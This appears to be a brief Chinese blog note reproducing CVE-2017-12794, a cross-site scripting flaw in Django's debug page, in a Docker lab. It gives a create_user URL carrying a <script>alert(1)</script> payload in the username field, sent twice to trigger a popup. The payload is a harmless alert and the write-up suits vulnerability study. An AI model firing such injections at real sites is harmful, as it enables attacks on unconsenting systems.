Django debug page XSS漏洞(CVE-2017-12794)复现

参考:https://paper.seebug.org/402/

使用docker搭建环境

访问:http://your-ip:8000/create_user/?username=<script>alert(1)</script>

成功创建一个用户

 再次访问  http://your-ip:8000/create_user/?username=<script>alert(1)</script>

触发弹窗

 

原文地址:https://www.cnblogs.com/rnss/p/13597549.html